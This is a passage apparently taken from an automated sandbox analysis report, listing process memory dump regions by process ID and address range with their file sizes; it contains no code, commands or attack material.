                                                                                                                                          • memory/3788-180-0x0000000000950000-0x00000000009FE000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            696KB

                                                                                                                                          • memory/3836-120-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/3836-145-0x0000000000010000-0x0000000000011000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/3836-173-0x0000000004820000-0x0000000004896000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            472KB

                                                                                                                                          • memory/3864-179-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4000-415-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4000-431-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/4036-162-0x0000000000F80000-0x0000000000F81000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4036-132-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4036-199-0x0000000003220000-0x0000000003232000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            72KB

                                                                                                                                          • memory/4052-115-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4176-405-0x00000249F4960000-0x00000249F49CF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            444KB

                                                                                                                                          • memory/4176-293-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4176-406-0x00000249F49D0000-0x00000249F4A9F000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            828KB

                                                                                                                                          • memory/4184-246-0x0000000005060000-0x0000000005666000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            6.0MB

                                                                                                                                          • memory/4184-216-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/4220-257-0x0000000005890000-0x0000000005D8E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            5.0MB

                                                                                                                                          • memory/4220-225-0x000000000041905A-mapping.dmp
                                                                                                                                          • memory/4220-241-0x0000000005930000-0x0000000005931000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4220-220-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/4372-567-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4416-253-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            120KB

                                                                                                                                          • memory/4416-255-0x0000000000418E52-mapping.dmp
                                                                                                                                          • memory/4416-269-0x0000000002D80000-0x0000000002D92000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            72KB

                                                                                                                                          • memory/4524-404-0x0000000004D70000-0x0000000004D71000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/4524-384-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4580-409-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4716-334-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4772-417-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/4772-442-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/4968-284-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            80KB

                                                                                                                                          • memory/4968-276-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5012-280-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5028-309-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-301-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-321-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-320-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-316-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-314-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-313-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-312-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-311-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-300-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-318-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-307-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-302-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-289-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-306-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-303-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-324-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-281-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5028-325-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5028-326-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5040-411-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5108-285-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5128-421-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5176-422-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5204-423-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5204-433-0x0000000004570000-0x00000000045CF000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            380KB

                                                                                                                                          • memory/5220-439-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                            Filesize

                                                                                                                                            4KB

                                                                                                                                          • memory/5220-424-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5232-425-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5244-426-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5276-427-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5316-429-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5364-432-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5416-435-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5428-436-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5464-579-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5476-573-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5568-445-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5628-453-0x00007FF6535E4060-mapping.dmp
                                                                                                                                          • memory/5968-542-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/5972-583-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6008-582-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6088-615-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6448-642-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6460-643-0x0000000000000000-mapping.dmp
                                                                                                                                          • memory/6472-644-0x0000000000000000-mapping.dmp